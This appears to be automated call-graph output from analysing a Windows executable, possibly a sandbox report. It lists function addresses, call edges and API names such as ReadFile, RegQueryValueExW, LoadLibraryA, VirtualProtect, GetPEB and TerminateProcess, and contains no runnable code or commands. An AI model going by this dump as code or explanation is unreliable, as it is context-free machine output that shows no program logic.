94835 e03503 94836 e03519 94835->94836 94837 e0350c 94835->94837 94839 e03543 94836->94839 94840 e03523 94836->94840 94877 e07c0e 47 API calls __getptd_noexit 94837->94877 94860 e0e5e0 94839->94860 94878 e07c0e 47 API calls __getptd_noexit 94840->94878 94841 e034dd _flsall @_EH4_CallFilterFunc@8 94841->94779 94847 e0e4d4 _flsall 94846->94847 94848 e07cf4 __lock 47 API calls 94847->94848 94855 e0e4e2 94848->94855 94849 e0e552 94880 e0e5d7 94849->94880 94850 e0e559 94885 e069d0 47 API calls _W_store_winword 94850->94885 94853 e0e5cc _flsall 94853->94835 94854 e0e560 94854->94849 94856 e0e56f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 94854->94856 94855->94849 94855->94850 94857 e07d7c __mtinitlocknum 47 API calls 94855->94857 94883 e04e5b 48 API calls __lock 94855->94883 94884 e04ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 94855->94884 94856->94849 94857->94855 94868 e0e600 __wopenfile 94860->94868 94861 e0e61a 94890 e07c0e 47 API calls __getptd_noexit 94861->94890 94863 e0e7d5 94863->94861 94867 e0e838 94863->94867 94864 e0e61f 94891 e06e10 8 API calls __wopenfile 94864->94891 94866 e0354e 94879 e03570 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 94866->94879 94887 e163c9 94867->94887 94868->94861 94868->94863 94892 e0185b 59 API calls 3 library calls 94868->94892 94871 e0e7ce 94871->94863 94893 e0185b 59 API calls 3 library calls 94871->94893 94873 e0e7ed 94873->94863 94894 e0185b 59 API calls 3 library calls 94873->94894 94875->94831 94876->94841 94877->94841 94878->94841 94879->94841 94886 e07e58 RtlLeaveCriticalSection 94880->94886 94882 e0e5de 94882->94853 94883->94855 94884->94855 94885->94854 94886->94882 94895 e15bb1 94887->94895 94889 e163e2 94889->94866 94890->94864 94891->94866 94892->94871 94893->94873 94894->94863 94898 e15bbd _flsall 94895->94898 94896 e15bcf 94897 e07c0e __dosmaperr 47 API calls 94896->94897 94899 e15bd4 94897->94899 94898->94896 94900 e15c06 94898->94900 94902 e06e10 __wopenfile 8 API calls 94899->94902 94901 e15c78 __wsopen_helper 110 API calls 94900->94901 94903 e15c23 94901->94903 94905 e15bde _flsall 94902->94905 94904 e15c4c __wsopen_helper RtlLeaveCriticalSection 94903->94904 94904->94905 94905->94889 94910 de42f6 94906->94910 94909 de42cc LoadLibraryA GetProcAddress 94909->94783 94911 de42aa 94910->94911 94912 de42ff LoadLibraryA 94910->94912 94911->94783 94911->94909 94912->94911 94913 de4310 GetProcAddress 94912->94913 94913->94911 94915 dff4ea 48 API calls 94914->94915 94916 de47c9 94915->94916 94916->94791 94918 de4085 FindResourceExW 94917->94918 94922 de40a2 94917->94922 94919 e54f16 LoadResource 94918->94919 94918->94922 94920 e54f2b SizeofResource 94919->94920 94919->94922 94921 e54f3f LockResource 94920->94921 94920->94922 94921->94922 94922->94792 94924 e54fe0 94923->94924 94925 de4526 94923->94925 94929 e03a8d 94925->94929 94927 de4534 94927->94799 94928->94792 94930 e03a99 _flsall 94929->94930 94931 e03aa7 94930->94931 94933 e03acd 94930->94933 94942 e07c0e 47 API calls __getptd_noexit 94931->94942 94934 e04e1c __lock_file 48 API calls 94933->94934 94936 e03ad3 94934->94936 94935 e03aac 94943 e06e10 8 API calls __wopenfile 94935->94943 94944 e039fe 81 API calls 4 library calls 94936->94944 94939 e03ae2 94945 e03b04 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 94939->94945 94941 e03ab7 _flsall 94941->94927 94942->94935 94943->94941 94944->94939 94945->94941 94949 e03839 94946->94949 94948 de4510 94948->94811 94950 e03845 _flsall 94949->94950 94951 e03888 94950->94951 94953 e0385b _memset 94950->94953 94961 e03880 _flsall 94950->94961 94952 e04e1c __lock_file 48 API calls 94951->94952 94955 e0388e 94952->94955 94976 e07c0e 47 API calls __getptd_noexit 94953->94976 94962 e0365b 94955->94962 94956 e03875 94977 e06e10 8 API calls __wopenfile 94956->94977 94961->94948 94964 e03676 _memset 94962->94964 94969 e03691 94962->94969 94963 e03681 95070 e07c0e 47 API calls __getptd_noexit 94963->95070 94964->94963 94964->94969 94971 e036cf 94964->94971 94966 e03686 95071 e06e10 8 API calls __wopenfile 94966->95071 94978 e038c2 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 94969->94978 94970 e037e0 _memset 95073 e07c0e 47 API calls __getptd_noexit 94970->95073 94971->94969 94971->94970 94973 e02933 __stbuf 47 API calls 94971->94973 94979 e0ee0e 94971->94979 95050 e0eb66 94971->95050 95072 e0ec87 47 API calls 4 library calls 94971->95072 94973->94971 94976->94956 94977->94961 94978->94961 94980 e0ee46 94979->94980 94981 e0ee2f 94979->94981 94983 e0f57e 94980->94983 94986 e0ee80 94980->94986 94982 e07bda __dosmaperr 47 API calls 94981->94982 94985 e0ee34 94982->94985 94984 e07bda __dosmaperr 47 API calls 94983->94984 94987 e0f583 94984->94987 94988 e07c0e __dosmaperr 47 API calls 94985->94988 94989 e0ee88 94986->94989 94997 e0ee9f 94986->94997 94990 e07c0e __dosmaperr 47 API calls 94987->94990 94993 e0ee3b 94988->94993 94991 e07bda __dosmaperr 47 API calls 94989->94991 94992 e0ee94 94990->94992 94994 e0ee8d 94991->94994 94995 e06e10 __wopenfile 8 API calls 94992->94995 94993->94971 94998 e07c0e __dosmaperr 47 API calls 94994->94998 94995->94993 94996 e0eeb4 94999 e07bda __dosmaperr 47 API calls 94996->94999 94997->94993 94997->94996 95000 e0eece 94997->95000 95001 e0eeec 94997->95001 94998->94992 94999->94994 95000->94996 95004 e0eed9 95000->95004 95003 e069d0 __malloc_crt 47 API calls 95001->95003 95005 e0eefc 95003->95005 95006 e13bf2 __stbuf 47 API calls 95004->95006 95007 e0ef04 95005->95007 95008 e0ef1f 95005->95008 95009 e0efed 95006->95009 95010 e07c0e __dosmaperr 47 API calls 95007->95010 95012 e0f82f __lseeki64_nolock 49 API calls 95008->95012 95011 e0f066 ReadFile 95009->95011 95016 e0f003 GetConsoleMode 95009->95016 95013 e0ef09 95010->95013 95014 e0f546 GetLastError 95011->95014 95015 e0f088 95011->95015 95017 e0ef2d 95012->95017 95018 e07bda __dosmaperr 47 API calls 95013->95018 95019 e0f553 95014->95019 95020 e0f046 95014->95020 95015->95014 95026 e0f058 95015->95026 95021 e0f063 95016->95021 95022 e0f017 95016->95022 95017->95004 95024 e0ef14 95018->95024 95025 e07c0e __dosmaperr 47 API calls 95019->95025 95028 e07bed __dosmaperr 47 API calls 95020->95028 95035 e0f04c 95020->95035 95021->95011 95022->95021 95023 e0f01d ReadConsoleW 95022->95023 95023->95026 95027 e0f040 GetLastError 95023->95027 95024->94993 95029 e0f558 95025->95029 95032 e0f0bd 95026->95032 95026->95035 95040 e0f32a 95026->95040 95027->95020 95028->95035 95030 e07bda __dosmaperr 47 API calls 95029->95030 95030->95035 95031 e01c9d _free 47 API calls 95031->94993 95034 e0f129 ReadFile 95032->95034 95042 e0f1aa 95032->95042 95036 e0f14a GetLastError 95034->95036 95048 e0f154 95034->95048 95035->94993 95035->95031 95036->95048 95037 e0f267 95044 e0f217 MultiByteToWideChar 95037->95044 95045 e0f82f __lseeki64_nolock 49 API calls 95037->95045 95038 e0f257 95043 e07c0e __dosmaperr 47 API calls 95038->95043 95039 e0f430 ReadFile 95041 e0f453 GetLastError 95039->95041 95049 e0f461 95039->95049 95040->95035 95040->95039 95041->95049 95042->95035 95042->95037 95042->95038 95042->95044 95043->95035 95044->95027 95044->95035 95045->95044 95046 e0f82f __lseeki64_nolock 49 API calls 95046->95048 95047 e0f82f __lseeki64_nolock 49 API calls 95047->95049 95048->95032 95048->95046 95049->95040 95049->95047 95051 e0eb71 95050->95051 95054 e0eb86 95050->95054 95052 e07c0e __dosmaperr 47 API calls 95051->95052 95053 e0eb76 95052->95053 95055 e06e10 __wopenfile 8 API calls 95053->95055 95056 e0ebbb 95054->95056 95057 e13e24 __getbuf 47 API calls 95054->95057 95064 e0eb81 95054->95064 95055->95064 95058 e02933 __stbuf 47 API calls 95056->95058 95057->95056 95059 e0ebcf 95058->95059 95060 e0ed06 __filbuf 62 API calls 95059->95060 95061 e0ebd6 95060->95061 95062 e02933 __stbuf 47 API calls 95061->95062 95061->95064 95063 e0ebf9 95062->95063 95063->95064 95065 e02933 __stbuf 47 API calls 95063->95065 95064->94971 95066 e0ec05 95065->95066 95066->95064 95067 e02933 __stbuf 47 API calls 95066->95067 95068 e0ec12 95067->95068 95069 e02933 __stbuf 47 API calls 95068->95069 95069->95064 95070->94966 95071->94969 95072->94971 95073->94966 95077 e0344a GetSystemTimeAsFileTime 95074->95077 95076 e2bdc3 95076->94813 95078 e03478 __aulldiv 95077->95078 95078->95076 95080 e03e71 _flsall 95079->95080 95081 e03e94 95080->95081 95082 e03e7f 95080->95082 95083 e04e1c __lock_file 48 API calls 95081->95083 95093 e07c0e 47 API calls __getptd_noexit 95082->95093 95086 e03e9a 95083->95086 95085 e03e84 95094 e06e10 8 API calls __wopenfile 95085->95094 95095 e03b0c 55 API calls 6 library calls 95086->95095 95089 e03ea5 95096 e03ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95089->95096 95091 e03eb7 95092 e03e8f _flsall 95091->95092 95092->94818 95093->95085 95094->95092 95095->95089 95096->95091 95098 e01e61 95097->95098 95101 e01e55 95097->95101 95121 e07c0e 47 API calls __getptd_noexit 95098->95121 95100 e02019 95105 e01e41 95100->95105 95122 e06e10 8 API calls __wopenfile 95100->95122 95101->95098 95111 e01ed4 95101->95111 95116 e09d6b 47 API calls 2 library calls 95101->95116 95104 e01fa0 95104->95098 95104->95105 95107 e01fb0 95104->95107 95105->94276 95106 e01f5f 95106->95098 95108 e01f7b 95106->95108 95118 e09d6b 47 API calls 2 library calls 95106->95118 95120 e09d6b 47 API calls 2 library calls 95107->95120 95108->95098 95108->95105 95110 e01f91 95108->95110 95119 e09d6b 47 API calls 2 library calls 95110->95119 95111->95098 95115 e01f41 95111->95115 95117 e09d6b 47 API calls 2 library calls 95111->95117 95115->95104 95115->95106 95116->95111 95117->95115 95118->95108 95119->95105 95120->95105 95121->95100 95122->95105 95145 e2c581 __tzset_nolock _wcscmp 95140->95145 95141 de44ed 64 API calls 95141->95145 95142 e2c05f 95142->94725 95142->94727 95143 e2bf5a GetSystemTimeAsFileTime 95143->95145 95144 de4517 83 API calls 95144->95145 95145->95141 95145->95142 95145->95143 95145->95144 95266 de6b0f 95237->95266 95239 deb69b 95278 deba85 95239->95278 95241 deb6b5 Mailbox 95241->94300 95244 deba85 48 API calls 95257 deb495 95244->95257 95245 e5397b 95292 e226bc 88 API calls 4 library calls 95245->95292 95246 deb9e4 95293 e226bc 88 API calls 4 library calls 95246->95293 95249 e53973 95249->95241 95252 e53989 95254 deba85 48 API calls 95252->95254 95253 debcce 48 API calls 95253->95257 95254->95249 95255 e53909 95288 de6b4a 95255->95288 95257->95239 95257->95244 95257->95245 95257->95246 95257->95253 95257->95255 95261 debdfa 48 API calls 95257->95261 95264 e53939 ___crtGetEnvironmentStringsW 95257->95264 95271 dec413 59 API calls 95257->95271 95272 debb85 95257->95272 95277 debc74 48 API calls 95257->95277 95286 dec6a5 49 API calls 95257->95286 95287 dec799 48 API calls ___crtGetEnvironmentStringsW 95257->95287 95259 e53914 95263 dff4ea 48 API calls 95259->95263 95262 deb66c CharUpperBuffW 95261->95262 95262->95257 95263->95264 95291 e226bc 88 API calls 4 library calls 95264->95291 95265->94304 95267 dff4ea 48 API calls 95266->95267 95268 de6b34 95267->95268 95269 de6b4a 48 API calls 95268->95269 95270 de6b43 95269->95270 95270->95257 95271->95257 95273 debb9b 95272->95273 95276 debb96 ___crtGetEnvironmentStringsW 95272->95276 95274 dfee75 48 API calls 95273->95274 95275 e51b77 95273->95275 95274->95276 95276->95257 95277->95257 95279 debb25 95278->95279 95282 deba98 ___crtGetEnvironmentStringsW 95278->95282 95281 dff4ea 48 API calls 95279->95281 95280 dff4ea 48 API calls 95284 deba9f 95280->95284 95281->95282 95282->95280 95283 debac8 95283->95241 95284->95283 95285 dff4ea 48 API calls 95284->95285 95285->95283 95286->95257 95287->95257 95289 dff4ea 48 API calls 95288->95289 95290 de6b54 95289->95290 95290->95259 95291->95249 95292->95252 95293->95249 95294->94325 95295->94311 95296->94319 95297->94322 95298->94328 95299->94338 95300->94340 95301->94344 95302->94023 95303->94023 95304->94025 95305->94025 95306->94017 95307->94013 95308->94026 95309->94038 95310->94038 95311->94039 95312->94055 95313->94061 95314 e519dd 95319 de4a30 95314->95319 95316 e519f1 95339 e00f0a 52 API calls __cinit 95316->95339 95318 e519fb 95320 de4a40 __ftell_nolock 95319->95320 95321 ded7f7 48 API calls 95320->95321 95322 de4af6 95321->95322 95340 de5374 95322->95340 95324 de4aff 95347 de363c 95324->95347 95331 ded7f7 48 API calls 95332 de4b32 95331->95332 95369 de49fb 95332->95369 95334 de4b3d _wcscat Mailbox __wsetenvp 95335 de4b43 Mailbox 95334->95335 95336 de61a6 48 API calls 95334->95336 95337 dece19 48 API calls 95334->95337 95338 de64cf 48 API calls 95334->95338 95335->95316 95336->95334 95337->95334 95338->95334 95339->95318 95383 e0f8a0 95340->95383 95343 dece19 48 API calls 95344 de53a7 95343->95344 95385 de660f 95344->95385 95346 de53b1 Mailbox 95346->95324 95348 de3649 __ftell_nolock 95347->95348 95412 de366c GetFullPathNameW 95348->95412 95350 de365a 95351 de6a63 48 API calls 95350->95351 95352 de3669 95351->95352 95353 de518c 95352->95353 95354 de5197 95353->95354 95355 de519f 95354->95355 95356 e51ace 95354->95356 95414 de5130 95355->95414 95358 de6b4a 48 API calls 95356->95358 95360 e51adb __wsetenvp 95358->95360 95359 de4b18 95363 de64cf 95359->95363 95361 dfee75 48 API calls 95360->95361 95362 e51b07 ___crtGetEnvironmentStringsW 95361->95362 95364 de651b 95363->95364 95368 de64dd ___crtGetEnvironmentStringsW 95363->95368 95366 dff4ea 48 API calls 95364->95366 95365 dff4ea 48 API calls 95367 de4b29 95365->95367 95366->95368 95367->95331 95368->95365 95424 debcce 95369->95424 95372 de4a2b 95372->95334 95373 e541cc RegQueryValueExW 95374 e541e5 95373->95374 95375 e54246 RegCloseKey 95373->95375 95376 dff4ea 48 API calls 95374->95376 95377 e541fe 95376->95377 95378 de47b7 48 API calls 95377->95378 95379 e54208 RegQueryValueExW 95378->95379 95380 e54224 95379->95380 95381 e5423b 95379->95381 95382 de6a63 48 API calls 95380->95382 95381->95375 95382->95381 95384 de5381 GetModuleFileNameW 95383->95384 95384->95343 95386 e0f8a0 __ftell_nolock 95385->95386 95387 de661c GetFullPathNameW 95386->95387 95392 de6a63 95387->95392 95389 de6643 95403 de6571 95389->95403 95393 de6adf 95392->95393 95395 de6a6f __wsetenvp 95392->95395 95408 deb18b 95393->95408 95396 de6a8b 95395->95396 95397 de6ad7 95395->95397 95398 de6b4a 48 API calls 95396->95398 95407 dec369 48 API calls 95397->95407 95400 de6a95 95398->95400 95401 dfee75 48 API calls 95400->95401 95402 de6ab6 ___crtGetEnvironmentStringsW 95401->95402 95402->95389 95404 de657f 95403->95404 95405 deb18b 48 API calls 95404->95405 95406 de658f 95405->95406 95406->95346 95407->95402 95409 deb199 95408->95409 95411 deb1a2 ___crtGetEnvironmentStringsW 95408->95411 95410 debdfa 48 API calls 95409->95410 95409->95411 95410->95411 95411->95402 95413 de368a 95412->95413 95413->95350 95415 de513f __wsetenvp 95414->95415 95416 e51b27 95415->95416 95417 de5151 95415->95417 95419 de6b4a 48 API calls 95416->95419 95418 debb85 48 API calls 95417->95418 95420 de515e ___crtGetEnvironmentStringsW 95418->95420 95421 e51b34 95419->95421 95420->95359 95422 dfee75 48 API calls 95421->95422 95423 e51b57 ___crtGetEnvironmentStringsW 95422->95423 95425 de4a0a RegOpenKeyExW 95424->95425 95426 debce8 95424->95426 95425->95372 95425->95373 95427 dff4ea 48 API calls 95426->95427 95428 debcf2 95427->95428 95429 dfee75 48 API calls 95428->95429 95429->95425 95430 e59bec 95465 df0ae0 Mailbox ___crtGetEnvironmentStringsW 95430->95465 95434 df0509 95530 e2cc5c 86 API calls 4 library calls 95434->95530 95435 df146e 95441 de6eed 48 API calls 95435->95441 95438 de6eed 48 API calls 95456 defec8 95438->95456 95440 dff4ea 48 API calls 95440->95456 95459 deffe1 Mailbox 95441->95459 95443 df1473 95529 e2cc5c 86 API calls 4 library calls 95443->95529 95444 e5a246 95448 de6eed 48 API calls 95444->95448 95445 e5a922 95448->95459 95449 e5a873 95450 ded7f7 48 API calls 95450->95456 95451 e5a30e 95451->95459 95525 e197ed InterlockedDecrement 95451->95525 95452 dece19 48 API calls 95452->95465 95453 e00f0a 52 API calls __cinit 95453->95456 95454 e197ed InterlockedDecrement 95454->95456 95456->95434 95456->95435 95456->95438 95456->95440 95456->95443 95456->95444 95456->95450 95456->95451 95456->95453 95456->95454 95457 e5a973 95456->95457 95456->95459 95461 df15b5 95456->95461 95522 df1820 335 API calls 2 library calls 95456->95522 95523 df1d10 59 API calls Mailbox 95456->95523 95531 e2cc5c 86 API calls 4 library calls 95457->95531 95460 e5a982 95528 e2cc5c 86 API calls 4 library calls 95461->95528 95462 e3e822 335 API calls 95462->95465 95463 dff4ea 48 API calls 95463->95465 95464 defe30 335 API calls 95464->95465 95465->95452 95465->95456 95465->95459 95465->95462 95465->95463 95465->95464 95466 e5a706 95465->95466 95468 df1526 Mailbox 95465->95468 95469 e197ed InterlockedDecrement 95465->95469 95470 e36ff0 335 API calls 95465->95470 95474 e40d1d 95465->95474 95477 e40d09 95465->95477 95480 e2b55b 95465->95480 95484 e3f0ac 95465->95484 95516 e2a6ef 95465->95516 95524 e3ef61 82 API calls 2 library calls 95465->95524 95526 e2cc5c 86 API calls 4 library calls 95466->95526 95527 e2cc5c 86 API calls 4 library calls 95468->95527 95469->95465 95470->95465 95532 e3f8ae 95474->95532 95476 e40d2d 95476->95465 95478 e3f8ae 129 API calls 95477->95478 95479 e40d19 95478->95479 95479->95465 95481 e2b564 95480->95481 95482 e2b569 95480->95482 95631 e2a4d5 95481->95631 95482->95465 95485 ded7f7 48 API calls 95484->95485 95486 e3f0c0 95485->95486 95487 ded7f7 48 API calls 95486->95487 95488 e3f0c8 95487->95488 95489 ded7f7 48 API calls 95488->95489 95490 e3f0d0 95489->95490 95491 de936c 81 API calls 95490->95491 95514 e3f0de 95491->95514 95492 de6a63 48 API calls 95492->95514 95493 e3f2cc 95494 e3f2f9 Mailbox 95493->95494 95663 de6b68 48 API calls 95493->95663 95494->95465 95495 e3f2b3 95497 de518c 48 API calls 95495->95497 95501 e3f2c0 95497->95501 95498 dec799 48 API calls 95498->95514 95499 e3f2ce 95502 de518c 48 API calls 95499->95502 95500 de6eed 48 API calls 95500->95514 95654 de510d 95501->95654 95504 e3f2dd 95502->95504 95506 de510d 48 API calls 95504->95506 95505 debdfa 48 API calls 95508 e3f175 CharUpperBuffW 95505->95508 95506->95493 95507 debdfa 48 API calls 95509 e3f23a CharUpperBuffW 95507->95509 95510 ded645 53 API calls 95508->95510 95653 dfd922 55 API calls 2 library calls 95509->95653 95510->95514 95512 de936c 81 API calls 95512->95514 95513 de510d 48 API calls 95513->95514 95514->95492 95514->95493 95514->95494 95514->95495 95514->95498 95514->95499 95514->95500 95514->95505 95514->95507 95514->95512 95514->95513 95515 de518c 48 API calls 95514->95515 95515->95514 95517 e2a6fb 95516->95517 95518 dff4ea 48 API calls 95517->95518 95519 e2a709 95518->95519 95520 e2a717 95519->95520 95521 ded7f7 48 API calls 95519->95521 95520->95465 95521->95520 95522->95456 95523->95456 95524->95465 95525->95459 95526->95468 95527->95459 95528->95459 95529->95449 95530->95445 95531->95460 95533 de936c 81 API calls 95532->95533 95534 e3f8ea 95533->95534 95558 e3f92c Mailbox 95534->95558 95568 e40567 95534->95568 95536 e3fb8b 95537 e3fcfa 95536->95537 95542 e3fb95 95536->95542 95615 e40688 89 API calls Mailbox 95537->95615 95540 e3fd07 95541 e3fd13 95540->95541 95540->95542 95541->95558 95581 e3f70a 95542->95581 95543 de936c 81 API calls 95549 e3f984 Mailbox 95543->95549 95548 e3fbc9 95595 dfed18 95548->95595 95549->95536 95549->95543 95549->95558 95599 e429e8 48 API calls ___crtGetEnvironmentStringsW 95549->95599 95600 e3fda5 60 API calls 2 library calls 95549->95600 95552 e3fbe3 95601 e2cc5c 86 API calls 4 library calls 95552->95601 95553 e3fbfd 95602 dfc050 95553->95602 95556 e3fbee GetCurrentProcess TerminateProcess 95556->95553 95557 e3fc14 95559 df1b90 48 API calls 95557->95559 95567 e3fc3e 95557->95567 95558->95476 95561 e3fc2d 95559->95561 95560 e3fd65 95560->95558 95564 e3fd7e FreeLibrary 95560->95564 95613 e4040f 105 API calls _free 95561->95613 95563 df1b90 48 API calls 95563->95567 95564->95558 95567->95560 95567->95563 95614 dedcae 50 API calls Mailbox 95567->95614 95616 e4040f 105 API calls _free 95567->95616 95569 debdfa 48 API calls 95568->95569 95570 e40582 CharLowerBuffW 95569->95570 95617 e21f11 95570->95617 95574 ded7f7 48 API calls 95575 e405bb 95574->95575 95624 de69e9 48 API calls ___crtGetEnvironmentStringsW 95575->95624 95577 e405d2 95578 deb18b 48 API calls 95577->95578 95579 e405de Mailbox 95578->95579 95580 e4061a Mailbox 95579->95580 95625 e3fda5 60 API calls 2 library calls 95579->95625 95580->95549 95582 e3f725 95581->95582 95586 e3f77a 95581->95586 95583 dff4ea 48 API calls 95582->95583 95584 e3f747 95583->95584 95585 dff4ea 48 API calls 95584->95585 95584->95586 95585->95584 95587 e40828 95586->95587 95588 e40a53 Mailbox 95587->95588 95594 e4084b _strcat _wcscpy __wsetenvp 95587->95594 95588->95548 95589 decf93 58 API calls 95589->95594 95590 ded286 48 API calls 95590->95594 95591 de936c 81 API calls 95591->95594 95592 e0395c 47 API calls _W_store_winword 95592->95594 95594->95588 95594->95589 95594->95590 95594->95591 95594->95592 95628 e28035 50 API calls __wsetenvp 95594->95628 95596 dfed2d 95595->95596 95597 dfedc5 VirtualProtect 95596->95597 95598 dfed93 95596->95598 95597->95598 95598->95552 95598->95553 95599->95549 95600->95549 95601->95556 95603 dfc064 95602->95603 95605 dfc069 Mailbox 95602->95605 95629 dfc1af 48 API calls 95603->95629 95611 dfc077 95605->95611 95630 dfc15c 48 API calls 95605->95630 95607 dff4ea 48 API calls 95609 dfc108 95607->95609 95608 dfc152 95608->95557 95610 dff4ea 48 API calls 95609->95610 95612 dfc113 95610->95612 95611->95607 95611->95608 95612->95557 95613->95567 95614->95567 95615->95540 95616->95567 95619 e21f3b __wsetenvp 95617->95619 95618 e21f79 95618->95574 95618->95579 95619->95618 95620 e21ffa 95619->95620 95622 e21f6f 95619->95622 95620->95618 95627 dfd37a 60 API calls 95620->95627 95622->95618 95626 dfd37a 60 API calls 95622->95626 95624->95577 95625->95580 95626->95622 95627->95620 95628->95594 95629->95605 95630->95611 95632 e2a5ee 95631->95632 95633 e2a4ec 95631->95633 95632->95482 95634 e2a5d4 Mailbox 95633->95634 95636 e2a58b 95633->95636 95637 e2a4fd 95633->95637 95635 dff4ea 48 API calls 95634->95635 95650 e2a54c Mailbox ___crtGetEnvironmentStringsW 95635->95650 95638 dff4ea 48 API calls 95636->95638 95639 dff4ea 48 API calls 95637->95639 95648 e2a51a 95637->95648 95638->95650 95639->95648 95640 e2a555 95644 dff4ea 48 API calls 95640->95644 95641 e2a545 95643 dff4ea 48 API calls 95641->95643 95642 dff4ea 48 API calls 95642->95632 95643->95650 95645 e2a55b 95644->95645 95651 e29d2d 48 API calls 95645->95651 95647 e2a567 95652 dfe65e 50 API calls 95647->95652 95648->95640 95648->95641 95648->95650 95650->95642 95651->95647 95652->95650 95653->95514 95655 de511f 95654->95655 95656 e51be7 95654->95656 95664 deb384 95655->95664 95673 e1a58f 48 API calls ___crtGetEnvironmentStringsW 95656->95673 95659 e51bf1 95661 de6eed 48 API calls 95659->95661 95660 de512b 95660->95493 95662 e51bf9 Mailbox 95661->95662 95663->95494 95665 deb392 95664->95665 95672 deb3c5 ___crtGetEnvironmentStringsW 95664->95672 95666 deb3fd 95665->95666 95667 deb3b8 95665->95667 95665->95672 95668 dff4ea 48 API calls 95666->95668 95669 debb85 48 API calls 95667->95669 95670 deb407 95668->95670 95669->95672 95671 dff4ea 48 API calls 95670->95671 95671->95672 95672->95660 95673->95659 95674 10ba640 95688 10b8260 95674->95688 95676 10ba708 95691 10ba530 95676->95691 95690 10b88eb 95688->95690 95694 10bb750 GetPEB 95688->95694 95690->95676 95692 10ba539 Sleep 95691->95692 95693 10ba547 95692->95693 95694->95690 95695 de3742 95696 de374b 95695->95696 95697 de37c8 95696->95697 95698 de3769 95696->95698 95736 de37c6 95696->95736 95700 de37ce 95697->95700 95701 e51e00 95697->95701 95702 de382c PostQuitMessage 95698->95702 95703 de3776 95698->95703 95699 de37ab NtdllDefWindowProc_W 95729 de37b9 95699->95729 95704 de37f6 SetTimer RegisterClipboardFormatW 95700->95704 95705 de37d3 95700->95705 95750 de2ff6 16 API calls 95701->95750 95702->95729 95707 e51e88 95703->95707 95708 de3781 95703->95708 95712 de381f CreatePopupMenu 95704->95712 95704->95729 95709 de37da KillTimer 95705->95709 95710 e51da3 95705->95710 95765 e24ddd 60 API calls _memset 95707->95765 95713 de3789 95708->95713 95714 de3836 95708->95714 95747 de3847 Shell_NotifyIconW _memset 95709->95747 95716 e51ddc MoveWindow 95710->95716 95717 e51da8 95710->95717 95711 e51e27 95751 dfe312 335 API calls Mailbox 95711->95751 95712->95729 95720 e51e6d 95713->95720 95721 de3794 95713->95721 95740 dfeb83 95714->95740 95716->95729 95723 e51dac 95717->95723 95724 e51dcb SetFocus 95717->95724 95720->95699 95764 e1a5f3 48 API calls 95720->95764 95726 de379f 95721->95726 95727 e51e58 95721->95727 95723->95726 95730 e51db5 95723->95730 95724->95729 95725 de37ed 95748 de390f DeleteObject DestroyWindow Mailbox 95725->95748 95726->95699 95752 de3847 Shell_NotifyIconW _memset 95726->95752 95763 e255bd 70 API calls _memset 95727->95763 95728 e51e9a 95728->95699 95728->95729 95749 de2ff6 16 API calls 95730->95749 95735 e51e68 95735->95729 95736->95699 95738 e51e4c 95753 de4ffc 95738->95753 95741 dfec1c 95740->95741 95742 dfeb9a _memset 95740->95742 95741->95729 95766 de51af 95742->95766 95744 dfec05 KillTimer SetTimer 95744->95741 95745 e53c7a Shell_NotifyIconW 95745->95744 95746 dfebc1 95746->95744 95746->95745 95747->95725 95748->95729 95749->95729 95750->95711 95751->95726 95752->95738 95754 de5027 _memset 95753->95754 95788 de4c30 95754->95788 95758 de50ca Shell_NotifyIconW 95761 de51af 50 API calls 95758->95761 95759 e53d28 Shell_NotifyIconW 95760 de50ac 95760->95758 95760->95759 95762 de50df 95761->95762 95762->95736 95763->95735 95764->95736 95765->95728 95767 de51cb 95766->95767 95787 de52a2 Mailbox 95766->95787 95768 de6b0f 48 API calls 95767->95768 95769 de51d9 95768->95769 95770 e53ca1 LoadStringW 95769->95770 95771 de51e6 95769->95771 95774 e53cbb 95770->95774 95772 de6a63 48 API calls 95771->95772 95773 de51fb 95772->95773 95773->95774 95775 de520c 95773->95775 95776 de510d 48 API calls 95774->95776 95777 de5216 95775->95777 95778 de52a7 95775->95778 95781 e53cc5 95776->95781 95780 de510d 48 API calls 95777->95780 95779 de6eed 48 API calls 95778->95779 95784 de5220 _memset _wcscpy 95779->95784 95780->95784 95782 de518c 48 API calls 95781->95782 95781->95784 95783 e53ce7 95782->95783 95786 de518c 48 API calls 95783->95786 95785 de5288 Shell_NotifyIconW 95784->95785 95785->95787 95786->95784 95787->95746 95789 e53c33 95788->95789 95790 de4c44 95788->95790 95789->95790 95791 e53c3c DestroyCursor 95789->95791 95790->95760 95792 e25819 61 API calls _W_store_winword 95790->95792 95791->95790 95792->95760 95793 e58eb8 95797 e2a635 95793->95797 95795 e58ec3 95796 e2a635 84 API calls 95795->95796 95796->95795 95799 e2a642 95797->95799 95804 e2a66f 95797->95804 95798 e2a671 95809 dfec4e 81 API calls 95798->95809 95799->95798 95801 e2a676 95799->95801 95799->95804 95806 e2a669 95799->95806 95802 de936c 81 API calls 95801->95802 95803 e2a67d 95802->95803 95805 de510d 48 API calls 95803->95805 95804->95795 95805->95804 95808 df4525 61 API calls ___crtGetEnvironmentStringsW 95806->95808 95808->95804 95809->95801 95810 e05dfd 95811 e05e09 _flsall 95810->95811 95847 e07eeb GetStartupInfoW 95811->95847 95813 e05e0e 95849 e09ca7 GetProcessHeap 95813->95849 95815 e05e66 95816 e05e71 95815->95816 95934 e05f4d 47 API calls 3 library calls 95815->95934 95850 e07b47 95816->95850 95819 e05e77 95820 e05e82 __RTC_Initialize 95819->95820 95935 e05f4d 47 API calls 3 library calls 95819->95935 95871 e0acb3 95820->95871 95823 e05e91 95824 e05e9d GetCommandLineW 95823->95824 95936 e05f4d 47 API calls 3 library calls 95823->95936 95890 e12e7d GetEnvironmentStringsW 95824->95890 95827 e05e9c 95827->95824 95831 e05ec2 95903 e12cb4 95831->95903 95834 e05ec8 95835 e05ed3 95834->95835 95938 e0115b 47 API calls 3 library calls 95834->95938 95917 e01195 95835->95917 95838 e05edb 95839 e05ee6 __wwincmdln 95838->95839 95939 e0115b 47 API calls 3 library calls 95838->95939 95921 de3a0f 95839->95921 95848 e07f01 95847->95848 95848->95813 95849->95815 95942 e0123a 30 API calls 2 library calls 95850->95942 95852 e07b4c 95943 e07e23 InitializeCriticalSectionAndSpinCount 95852->95943 95854 e07b51 95855 e07b55 95854->95855 95945 e07e6d TlsAlloc 95854->95945 95944 e07bbd 50 API calls 2 library calls 95855->95944 95858 e07b67 95858->95855 